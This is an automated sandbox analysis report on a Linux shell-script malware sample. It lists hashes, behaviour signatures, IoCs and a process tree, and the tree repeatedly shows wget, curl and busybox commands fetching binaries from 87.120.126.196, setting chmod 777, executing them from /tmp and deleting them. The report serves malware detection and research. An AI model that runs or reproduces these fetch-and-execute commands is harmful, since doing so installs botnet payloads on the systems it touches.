Analysis
-
max time kernel
80s -
max time network
82s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
25/10/2024, 01:17
Static task
static1
Behavioral task
behavioral1
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
-
Size
10KB
-
MD5
5162438af338945d51bf275a08c71d1b
-
SHA1
08afc256b7a2d67ce5d019cf6633b8ac69ecf749
-
SHA256
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760
-
SHA512
f106888effaf28760884756fafc0f9eaa435bcca7312c118cd9de9e6247c65cbc3568f3483e66eb553e80c73a4279c99136513d3500b4b2bef751dc2d1839d32
-
SSDEEP
96:XNhHXJX740n2TT9740rA10KKNDcgQ9Jok:XNhHXJ740n2h40X10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 894 chmod 954 chmod 828 chmod 912 chmod 924 chmod 966 chmod 843 chmod 972 chmod 888 chmod 809 chmod 819 chmod 948 chmod 741 chmod 870 chmod 747 chmod 876 chmod 882 chmod 906 chmod 942 chmod 984 chmod 754 chmod 918 chmod 930 chmod 960 chmod 900 chmod 936 chmod 978 chmod 784 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC 742 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe 748 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB 755 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 786 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl 811 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV 820 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr 829 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr 844 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC 871 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm 877 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff 883 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp 889 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV 895 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad 901 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad 907 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff 913 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp 919 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV 925 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 931 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl 937 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV 943 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC 949 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe 955 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB 961 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr 967 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm 973 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr 979 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC 985 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 959 busybox 962 rm 750 wget 755 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB 758 rm 958 curl 961 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB 751 curl 752 busybox 957 wget -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV curl File opened for modification /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC curl File opened for modification /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC curl File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff curl File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp curl File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad curl File opened for modification /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB curl File opened for modification /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe curl File opened for modification /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm curl File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff curl File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV curl File opened for modification /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC curl File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp curl File opened for modification /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe curl File opened for modification /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr curl File opened for modification /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr curl File opened for modification /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr curl File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl curl File opened for modification /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm curl File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 curl File opened for modification /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr curl File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 curl File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl curl File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV curl File opened for modification /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC curl File opened for modification /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB curl File opened for modification /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV curl File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad curl
Processes
-
/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:718
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:740
-
-
/bin/chmodchmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:746
-
-
/bin/chmodchmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:750
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:752
-
-
/bin/chmodchmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:755
-
-
/bin/rmrm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:758
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:776
-
-
/bin/chmodchmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:798
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:807
-
-
/bin/chmodchmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:818
-
-
/bin/chmodchmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:827
-
-
/bin/chmodchmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:839
-
-
/bin/chmodchmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:847
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:869
-
-
/bin/chmodchmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:875
-
-
/bin/chmodchmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:878
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:879
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:881
-
-
/bin/chmodchmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:884
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:885
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:887
-
-
/bin/chmodchmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:890
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:891
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:893
-
-
/bin/chmodchmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:896
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:897
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:899
-
-
/bin/chmodchmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:902
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:903
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:905
-
-
/bin/chmodchmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:908
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:909
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:911
-
-
/bin/chmodchmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:914
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:915
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:917
-
-
/bin/chmodchmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:920
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:921
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:923
-
-
/bin/chmodchmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:926
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:927
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:929
-
-
/bin/chmodchmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:932
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:933
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:935
-
-
/bin/chmodchmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:938
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:939
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:941
-
-
